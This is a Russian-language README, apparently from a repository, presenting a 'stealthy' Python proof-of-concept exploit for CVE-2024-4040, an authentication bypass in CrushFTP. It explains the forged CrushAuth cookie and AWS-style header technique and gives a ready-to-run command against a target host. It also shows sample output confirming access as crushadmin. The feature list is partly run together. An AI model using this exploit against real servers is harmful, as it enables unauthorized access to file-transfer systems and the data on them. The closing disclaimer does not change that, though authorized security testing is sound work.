
Эксплойт для CVE-2024-4040 – обход аутентификации в CrushFTP через cookie CrushAuth и подмену заголовков в стиле AWS. Скрытный PoC на Python с безопасной генерацией токенов, обходом SSL и улучшенным выводом.
В этом репозитории содержится скрытный proof-of-concept (PoC) эксплойт на Python для CVE-2024-4040, критической уязвимости в CrushFTP (v10 и ниже), которая позволяет злоумышленнику обойти аутентификацию с помощью поддельной cookie CrushAuth и заголовка Authorization в стиле AWS.
Неаутентифицированный злоумышленник может обойти аутентификацию в уязвимых экземплярах CrushFTP, сформировав определённую комбинацию cookie/заголовка, и получить несанкционированный доступ к внутренним веб-функциям.
CrushAuth с использованием secretsAuthorization в стиле AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — базовый URL сервера CrushFTP
--valid_username — известный действительный пользователь (по умолчанию: crushadmin)
🔍 Пример вывода
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
Этот код предназначен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Рефакторинг PoC: illdeed